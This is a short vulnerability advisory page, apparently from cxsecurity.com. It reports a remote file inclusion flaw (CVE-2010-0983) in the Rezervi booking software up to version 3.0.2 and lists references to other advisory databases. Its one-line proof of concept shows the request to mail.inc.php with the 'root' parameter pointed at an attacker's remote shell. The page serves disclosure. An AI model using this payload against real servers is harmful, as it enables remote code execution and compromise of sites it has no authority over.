Bug: Rezervi <= 3.0.2 (mail.inc.php) RFI Vulnerablitie (WLB-2010030218 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: Rezervi <= 3.0.2 (mail.inc.php) RFI Vulnerablitie
 Credit: r00t.h4x0r
 Date: 2010.03.20
 CWE: CWE-94 (Show similar)
 CVE: CVE-2010-0983 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
Medium
No
Yes

###############################################################
## Rezervi <= 3.0.2 (mail.inc.php) RFI Vulnerablities ##
## http://www.rezervi.com ##
###############################################################



###############################################################
Discovered : r00t.h4x0r <r00t.h4x0r[!]hotmail.com>
Homepage : !n y0ur m!nd
###############################################################
PoC r00t :

[r00t.h4x0r]/include/mail.inc.php?root=[Shell]

###############################################################
9r33tz : cr4wl3r
###############################################################

#################### [ INDONESIAN HACKER ] ####################

References:

http://xforce.iss.net/xforce/xfdb/55341
http://www.vupen.com/english/advisories/2010/0016
http://www.securityfocus.com/bid/37589
http://www.exploit-db.com/exploits/10967
http://secunia.com/advisories/38118
http://packetstormsecurity.org/1001-exploits/rezervi-rfi.txt
http://osvdb.org/61450

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com